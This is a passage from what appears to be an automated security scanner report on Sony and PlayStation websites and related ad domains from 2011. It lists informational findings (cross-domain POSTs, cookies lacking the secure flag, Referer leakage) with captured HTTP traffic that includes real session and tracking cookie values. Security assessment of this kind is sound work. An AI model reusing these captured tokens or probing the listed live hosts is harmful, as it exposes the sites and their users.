<a href="http://products.sel.sony.com/SEL/legal/privacy.html" target="_blank" class="infoLinks"
...[SNIP]...

20. Cross-domain POST previous next
There are 2 instances of this issue:

/
/2011/04/26/update-on-playstation-network-and-qriocity/

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

20.1. http://blog.us.playstation.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.us.playstation.com
Path:	/

Issue detail

The page contains a form which POSTs data to the domain www.feedburner.com. The form contains the following fields:

email
url
title
loc

Request

GET / HTTP/1.1
Host: blog.us.playstation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1305491253|session#1305491190457-245340#1305493053; APPLICATION_SITE_URL=http%3A//us.playstation.com/psn/; __utmz=1.1305491193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.170304013.1305491193.1305491193.1305491193.1; __utmc=1; __utmb=1.1.10.1305491193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 15 May 2011 20:26:34 GMT
Content-Type: text/html; charset=UTF-8
Cneonction: close
Vary: Cookie
Last-Modified: Sun, 15 May 2011 20:21:54 +0000
Cache-Control: max-age=20, must-revalidate
X-Pingback: http://blog.us.playstation.com/xmlrpc.php
X-hax0r: sean at voce connect
Content-Length: 71106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<div id="email-form">
<form action="http://www.feedburner.com/fb/a/emailverify" method="post">
<h2>
...[SNIP]...

20.2. http://blog.us.playstation.com/2011/04/26/update-on-playstation-network-and-qriocity/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.us.playstation.com
Path:	/2011/04/26/update-on-playstation-network-and-qriocity/

Issue detail

The page contains a form which POSTs data to the domain www.feedburner.com. The form contains the following fields:

email
url
title
loc

Request

GET /2011/04/26/update-on-playstation-network-and-qriocity/ HTTP/1.1
Host: blog.us.playstation.com
Proxy-Connection: keep-alive
Referer: http://us.playstation.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: APPLICATION_SITE_URL=http%3A//us.playstation.com/psn/; __utmz=110009370.1305491197.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=110009370.1768330900.1305491197.1305491197.1305491197.1; __utmc=110009370; __utmb=110009370.1.10.1305491197; s_vi=[CS]v1|26E81B82051D2A0E-60000127A0560B82[CE]; mbox=check#true#1305491253|session#1305491190457-245340#1305493053|PC#1305491190457-245340.17#1306700808; _chartbeat2=ix9mg0xw31e8v9kg; __utma=1.1480493672.1305491193.1305491193.1305491193.1; __utmc=1; __utmb=1.1.10.1305491193; s_pers=%20gpv_pageName%3DPSN_UPDATE/UNAUTHORIZED_INTERUSION_ALERT/LEARN_MORE/PS%7C1305493192792%3B%20s_nr%3D1305491392793-New%7C1337027392793%3B%20s_pv%3DPSN_UPDATE/UNAUTHORIZED_INTERUSION_ALERT/LEARN_MORE/PS%7C1305493192795%3B; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D34%3B%20s_sq%3Dsceaplaystationprod%253D%252526pid%25253DPSN_UPDATE/UNAUTHORIZED_INTERUSION_ALERT/LEARN_MORE/PS%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//blog.us.playstation.com/2011/04/26/update-on-playstation-network-and-qriocity/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 15 May 2011 20:29:54 GMT
Content-Type: text/html; charset=UTF-8
Cneonction: close
Vary: Cookie
Last-Modified: Sun, 15 May 2011 20:27:46 +0000
Cache-Control: max-age=172, must-revalidate
X-Pingback: http://blog.us.playstation.com/xmlrpc.php
Link: <http://blog.us.playstation.com/?p=50646>; rel=shortlink
X-hax0r: sean at voce connect
Content-Length: 82583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<div id="email-form">
<form action="http://www.feedburner.com/fb/a/emailverify" method="post">
<h2>
...[SNIP]...

21. SSL cookie without secure flag set previous next
There are 2 instances of this issue:

https://www.mcafeesecure.com/RatingVerify
https://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderCheckout

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

21.1. https://www.mcafeesecure.com/RatingVerify previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.mcafeesecure.com
Path:	/RatingVerify

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

CAMEFROM=www.fingerhut.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

21.2. https://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderCheckout previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/SYOrderCheckout

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TS5bbf46=59f0262ca3943c7bd6ffb222b0c38a9178ed098d530cefc94dd0437160ac0ec518a9cd87529ede9f11ea93b61389de873146ef5f529ede9ff3fa25813fc776346bd26e6edb2332024890f70e222f7b4e4890f70e4b9b8efe5667a7cd4deb37804890f70ef7bac4d65cd85ce1ea147da6d07ba995; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
ntCoent-Length: 4641
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 4641
Vary: Accept-Encoding
Date: Sun, 15 May 2011 21:22:00 GMT
Connection: keep-alive
Set-Cookie: WC_AUTHENTICATION_239700478=239700478%2cARTMLPmZA%2bNj0aVeOmxZC%2bX1cak%3d; Path=/; Secure
Set-Cookie: TS5bbf46=59f0262ca3943c7bd6ffb222b0c38a9178ed098d530cefc94dd0437160ac0ec518a9cd87529ede9f11ea93b61389de873146ef5f529ede9ff3fa25813fc776346bd26e6edb2332024890f70e222f7b4e4890f70e4b9b8efe5667a7cd4deb37804890f70ef7bac4d65cd85ce1ea147da6d07ba995; Path=/
Cache-Control: private
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="meta_refresh" ht
...[SNIP]...

22. Cross-domain Referer leakage previous next
There are 76 instances of this issue:

http://ad-emea.doubleclick.net/adj/tmg.telegraph.sponsored/sponsored.travel
http://ad-emea.doubleclick.net/adj/tmg.telegraph.sponsored/sponsored.travel.disney
http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28
http://ad.doubleclick.net/adi/N4764.cruisecritic/B3091233
http://ad.doubleclick.net/adi/N4975.1207.TRAVELOCITY.COM/B5393428.18
http://ad.doubleclick.net/adi/N5823.DbclkAdEx/B5478635.45
http://ad.doubleclick.net/adi/ta.cc.com.s/deals
http://ad.doubleclick.net/adi/ta.cc.com.s/deals
http://ad.doubleclick.net/adi/ta.cc.com.s/deals
http://ad.doubleclick.net/adi/ta.cc.com.s/disney
http://ad.doubleclick.net/adi/ta.cc.com.s/disney
http://ad.doubleclick.net/adi/ta.cc.com.s/disney
http://ad.doubleclick.net/adi/x1.dt/dt
http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest
http://ad.turn.com/server/ads.js
http://adadvisor.net/adscores/g.js
http://admeld.adnxs.com/usersync
http://bh.contextweb.com/bh/drts
http://bp.specificclick.net/
http://choices.truste.com/ca
http://cm.g.doubleclick.net/pixel
http://cm.g.doubleclick.net/pixel
http://cm.g.doubleclick.net/pixel
http://cm.g.doubleclick.net/pixel
http://cplads.appspot.com/ad_tag/three_pas/everst3tags4222011appliedmanagementcontentonlinecollegesappliedmanagement300x250
http://disneycruise.disney.go.com/reservations/customize
http://f.nexac.com/e/a-677/s-2140.xgi
http://f.nexac.com/e/a-677/s-2140.xgi
http://fls.doubleclick.net/activityi
http://fls.doubleclick.net/activityi
http://fls.doubleclick.net/activityi
http://fls.doubleclick.net/activityi
http://fls.doubleclick.net/activityi
http://fls.doubleclick.net/activityi
http://fls.doubleclick.net/activityj
http://gannett.gcion.com/addyn/3.0/5111.1/809051/0/-1/ADTECH
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://serv.adspeed.com/ad.php
http://sony.links.channelintelligence.com/pages/prices.asp
http://track.searchignite.com/si/CM/Tracking/ClickTracking.aspx
http://wow.weather.com/weather/wow/module/USNY0400
http://www.bhphotovideo.com/bnh/controller/home
http://www.cruisecritic.com/reviews/cruiseline.cfm
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/trends/hottrends
http://www.imiclk.com/cgi/r.cgi
http://www.magicalkingdoms.com/blog/wp-content/plugins/sexybookmarks/spritegen_default/jquery.shareaholic-publishers-sb.min.js
http://www.mcafeesecure.com/Link.sa
http://www.mcafeesecure.com/Link.sa
http://www.mcafeesecure.com/Link.sa
https://www.mcafeesecure.com/RatingVerify
https://www.mcafeesecure.com/us/legalinfo.jsp
http://www.observertoday.com/page/content.detail/id/559280/-Special-day--for-1-000-graduates-at-Fredonia-State.html
http://www.popularmedia.net/widget/2be74c3e1d1bba1022bc80b0b5e0e0a5
http://www.siteadvisor.com/download/windows.html
http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay
http://www.sonystyle.com/webapp/wcs/stores/servlet/OrderItemDisplay
http://www.sonystyle.com/webapp/wcs/stores/servlet/SYCTOProcess
http://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderItemAddProxy
http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay
https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm
https://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderCheckout
https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

22.1. http://ad-emea.doubleclick.net/adj/tmg.telegraph.sponsored/sponsored.travel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adj/tmg.telegraph.sponsored/sponsored.travel

Issue detail

The page was loaded from a URL containing a query string:

http://ad-emea.doubleclick.net/adj/tmg.telegraph.sponsored/sponsored.travel;at=pp;pos=3;sc=sponsored-travel;pt=story;pg=8509794;lvl=3;biw=1136;bih=902;fv=10;sz=1x1;tile=3;ord=1305509216094?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/817-grey.gif

Request

GET /adj/tmg.telegraph.sponsored/sponsored.travel;at=pp;pos=3;sc=sponsored-travel;pt=story;pg=8509794;lvl=3;biw=1136;bih=902;fv=10;sz=1x1;tile=3;ord=1305509216094? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/8509794/Win-a-fantastic-holiday-to-Walt-Disney-World-Florida-and-a-Disney-Cruise-in-the-Bahamas.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 261
Date: Mon, 16 May 2011 01:27:15 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<a target="_blank" href="http://ad-emea.doubleclick.net/click;h=v8/3b09/0/0/%2a/l;44306;0-0;0;63041495;31-1/1;0/0/0;;~aopt=2/1/3b/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

22.2. http://ad-emea.doubleclick.net/adj/tmg.telegraph.sponsored/sponsored.travel.disney previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adj/tmg.telegraph.sponsored/sponsored.travel.disney

Issue detail

The page was loaded from a URL containing a query string:

http://ad-emea.doubleclick.net/adj/tmg.telegraph.sponsored/sponsored.travel.disney;at=header;pos=1;sc=sponsored-travel-disney;pt=story;pg=8509938;lvl=4;biw=1136;bih=902;fv=10;sz=1x1;tile=1;ord=1305508777021?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/817-grey.gif

Request

GET /adj/tmg.telegraph.sponsored/sponsored.travel.disney;at=header;pos=1;sc=sponsored-travel-disney;pt=story;pg=8509938;lvl=4;biw=1136;bih=902;fv=10;sz=1x1;tile=1;ord=1305508777021? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 261
Date: Mon, 16 May 2011 01:19:38 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<a target="_blank" href="http://ad-emea.doubleclick.net/click;h=v8/3b09/0/0/%2a/d;44306;0-0;0;63986873;31-1/1;0/0/0;;~aopt=2/1/3b/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

22.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3941.InviteMedia/B5396963.28

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28;sz=728x90;pc=[TPAS_ID];click=http://ads.bluelithium.com/clk?2,13%3B8d02082879581ff7%3B12ff663a67a,0%3B%3B%3B2397112293,CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAeqZj9i8BAAAAAAAAAGE2MjQzODgyLTdmNWEtMTFlMC04YTVhLTc3NDdlNGUwYmMzYwCXoQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371&pubICode=1725912&pub=363112&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=;ord=1305508816?

The response contains the following links to other domains:

http://s0.2mdn.net/2554462/TWCBC_Q2_LeadGen_Banners_Dark_TX_728x90.gif
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N3941.InviteMedia/B5396963.28;sz=728x90;pc=[TPAS_ID];click=http://ads.bluelithium.com/clk?2,13%3B8d02082879581ff7%3B12ff663a67a,0%3B%3B%3B2397112293,CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAeqZj9i8BAAAAAAAAAGE2MjQzODgyLTdmNWEtMTFlMC04YTVhLTc3NDdlNGUwYmMzYwCXoQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371&pubICode=1725912&pub=363112&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=;ord=1305508816? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAAMAGSKWj0T-amZmZmZnpPwBwCJqODNY.AAAAAAAA8D8AcAiajgzWPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADI6aWeTWAZCpUsQVInXGZ0vFMokz1-sdRznR8RAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,Z%3D728x90%26s%3D1565884%26_salt%3D3199842828%26B%3D10%26r%3D0,a6243882-7f5a-11e0-8a5a-7747e4e0bc3c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 8329
Date: Mon, 16 May 2011 01:27:08 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
erID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=http%3a%2f%2fwww.twcbc.com/Texas/LeadGen/tsmoffer_acq.html%3Fmediaid%3Dneobc_d_0000001182"><img src="http://s0.2mdn.net/2554462/TWCBC_Q2_LeadGen_Banners_Dark_TX_728x90.gif" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

22.4. http://ad.doubleclick.net/adi/N4764.cruisecritic/B3091233 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4764.cruisecritic/B3091233

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N4764.cruisecritic/B3091233;sz=160x600;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b09/3/0/%2a/i%3B221091654%3B1-0%3B1%3B31122603%3B2321-160/600%3B30717713/30735589/1%3B%3B~aopt%3D2/1/8ab8/0%3B~sscs%3D%3f;ord=1774377?

The response contains the following links to other domains:

http://s0.2mdn.net/1512030/bbd_160600-020_01.gif
http://s0.2mdn.net/1512030/bbd_160600-020_02.gif

Request

GET /adi/N4764.cruisecritic/B3091233;sz=160x600;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b09/3/0/%2a/i%3B221091654%3B1-0%3B1%3B31122603%3B2321-160/600%3B30717713/30735589/1%3B%3B~aopt%3D2/1/8ab8/0%3B~sscs%3D%3f;ord=1774377? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ta.cc.com.s/deals;pos=right1;sz=160x600;region=;city=;cruiseline=;style=;pagetype=;tile=11;ord=051511092806?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5433
Date: Mon, 16 May 2011 01:34:34 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>BookingBuddy.com</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<table
...[SNIP]...
Dv8/3b09/3/0/%2a/i%3B221091654%3B1-0%3B1%3B31122603%3B2321-160/600%3B30717713/30735589/1%3B%3B~aopt%3D2/1/8ab8/0%3B~sscs%3D%3fhttp%3A%2F%2Frd.bookingbuddy.com/?r=bbs_cruisecritic_ros_160600-020_tm"

><img

src="http://s0.2mdn.net/1512030/bbd_160600-020_01.gif" width="158" height="171" alt="" border="0"></a>
...[SNIP]...
8/3b09/3/0/%2a/i%3B221091654%3B1-0%3B1%3B31122603%3B2321-160/600%3B30717713/30735589/1%3B%3B~aopt%3D2/1/8ab8/0%3B~sscs%3D%3fhttp%3A%2F%2Frd.bookingbuddy.com/?r=bbs_cruisecritic_ros_160600-020_more"

><img

src="http://s0.2mdn.net/1512030/bbd_160600-020_02.gif" width="158" height="64" alt="" border="0"></a>
...[SNIP]...

22.5. http://ad.doubleclick.net/adi/N4975.1207.TRAVELOCITY.COM/B5393428.18 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4975.1207.TRAVELOCITY.COM/B5393428.18

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N4975.1207.TRAVELOCITY.COM/B5393428.18;sz=160x600;click=http://dm.travelocity.com/event.ng/Type%3dclick%26FlightID%3d122243%26AdID%3d164325%26TargetID%3d8852%26Segments%3d1,9,3090,4300,4303,5796,5907,9520,10495,11148,12670,13331,18268,20052,20168,20299,20311,21094,21281%26Targets%3d8427,8852,28340,30167,30402,30431,31703,31958,8948%26Values%3d25,30,51,60,72,80,92,101,110,152,194,215,234,261,293,2176,2218,2285,2305,2306,2307,2308,2310,2340,2342,2343,2359,2432,2468,2537,4760,4772,6472,6474,6974,8257,8512,8829,9120,9844,9845,9846,12194,12196%26Redirect%3d;ord=nkufyk,bgKaRRRrgqcz?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2457585/TA_Travelocity_50off_160x600.jpg

Request

GET /adi/N4975.1207.TRAVELOCITY.COM/B5393428.18;sz=160x600;click=http://dm.travelocity.com/event.ng/Type%3dclick%26FlightID%3d122243%26AdID%3d164325%26TargetID%3d8852%26Segments%3d1,9,3090,4300,4303,5796,5907,9520,10495,11148,12670,13331,18268,20052,20168,20299,20311,21094,21281%26Targets%3d8427,8852,28340,30167,30402,30431,31703,31958,8948%26Values%3d25,30,51,60,72,80,92,101,110,152,194,215,234,261,293,2176,2218,2285,2305,2306,2307,2308,2310,2340,2342,2343,2359,2432,2468,2537,4760,4772,6472,6474,6974,8257,8512,8829,9120,9844,9845,9846,12194,12196%26Redirect%3d;ord=nkufyk,bgKaRRRrgqcz? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=cruise&paxa=0&paxs=0&paxc=0&adloc=NA&random=813059&tile=534041638164681
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1144
Date: Mon, 16 May 2011 01:29:31 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b09/c/1f6/%2a/
...[SNIP]...
s/0%2C%2CTRAVELOCITY%257C6615%257Chotels_main%2C00.html%3Fchannel%3Donline-media%26country%3Dus%26tacampaign%3Dgas-us%26campaign%3Ddisplay%26website%3Dtravelocity%26placement%3Dros%26adunit%3D160x600"><img src="http://s0.2mdn.net/viewad/2457585/TA_Travelocity_50off_160x600.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

22.6. http://ad.doubleclick.net/adi/N5823.DbclkAdEx/B5478635.45 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.DbclkAdEx/B5478635.45

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N5823.DbclkAdEx/B5478635.45;sz=728x90;ord=7992084605561387239;AD_ID=26005388;BEHAVIOR_SIGNAL_ID=319697420;CHANNEL_ID=11185948;LINE_ITEM_ID=184588126;PUBLISHER_ID=11185880;SITE_ID=13906109?;click=http://r.turn.com/r/tpclick/id/57ha2ZqW6W5ZugEAbQABAA/3c/http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBrsFWtn7QTcaOFpLWsAe-wuzACo200M4B9bmdvRTJkYikFwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05OTQyNTMwMzg1NDg1MDkwsgEZc2VjdXJlc2hvcHBpbmcubWNhZmVlLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly9zZWN1cmVzaG9wcGluZy5tY2FmZWUuY29tL5gC1LsBwAIEyAK1nNURqAMB6ANO6AO7AugDmALoAxL1AwYAAASABqXS-q_P08q2hQE%26num%3D1%26sig%3DAGiWqtycjJBgtabbvXcUHzHk2Ua0lvcnqA%26client%3Dca-pub-9942530385485090%26adurl%3D/url/;

The response contains the following link to another domain:

